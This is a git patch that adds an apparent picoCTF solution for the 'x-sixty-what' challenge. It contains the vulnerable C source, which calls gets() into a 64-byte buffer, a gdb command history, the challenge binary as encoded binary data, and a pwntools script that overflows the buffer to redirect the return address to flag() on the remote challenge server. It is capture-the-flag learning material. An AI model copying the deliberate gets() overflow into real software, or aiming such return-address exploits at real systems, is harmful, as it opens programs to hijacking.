From fe67eec9c36edc3273f9feb1f5691d6c097fd036 Mon Sep 17 00:00:00 2001
From: THEON-1 <git@theon-1.de>
Date: Mon, 8 Dec 2025 13:36:09 +0100
Subject: [PATCH] x-sixty-what

---
 x-sixty-what/.gdb_history |  25 +++++++++++++++++++++++++
 x-sixty-what/sol.py       |  19 +++++++++++++++++++
 x-sixty-what/vuln         | Bin 0 -> 17128 bytes
 x-sixty-what/vuln.c       |  37 +++++++++++++++++++++++++++++++++++++
 4 files changed, 81 insertions(+)
 create mode 100644 x-sixty-what/.gdb_history
 create mode 100755 x-sixty-what/sol.py
 create mode 100755 x-sixty-what/vuln
 create mode 100644 x-sixty-what/vuln.c

diff --git a/x-sixty-what/.gdb_history b/x-sixty-what/.gdb_history
new file mode 100644
index 0000000..81b5ded
--- /dev/null
+++ b/x-sixty-what/.gdb_history
@@ -0,0 +1,25 @@
+show vuln
+list vuln
+b vuln
+exit
+info functions
+list main
+disassemble main
+disasm main
+disassemble main
+disassemble *main
+b vuln
+exit
+disassemble main
+disassemble vuln 
+b vuln+2
+b *vuln+2
+exit
+disassemble vuln 
+b *vuln+24
+run
+stackf
+nexti 
+stackf
+disassemble flag 
+exit
diff --git a/x-sixty-what/sol.py b/x-sixty-what/sol.py
new file mode 100755
index 0000000..2fc31e6
--- /dev/null
+++ b/x-sixty-what/sol.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_base = 0x7fffffffcf70
+ret_addr = 0x7fffffffcfb8
+ret_offset = ret_addr - buffer_base
+flag_fun_addr = 0x0000000000401236
+flag_fun_offset = 5
+target_addr = flag_fun_addr + flag_fun_offset
+
+send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
+
+#conn = process("./vuln")
+conn = remote('saturn.picoctf.net', 60832)
+
+conn.recvline()
+conn.sendline(send_buffer)
+conn.interactive()
+
diff --git a/x-sixty-what/vuln b/x-sixty-what/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..4f16c682402bb9c5118d12336017934cba3223eb
GIT binary patch
literal 17128
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
JE(4bc{|2j1kR1R3

literal 0
HcmV?d00001

diff --git a/x-sixty-what/vuln.c b/x-sixty-what/vuln.c
new file mode 100644
index 0000000..fc76b33
--- /dev/null
+++ b/x-sixty-what/vuln.c
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFFSIZE];
+  gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+  vuln();
+  return 0;
+}
+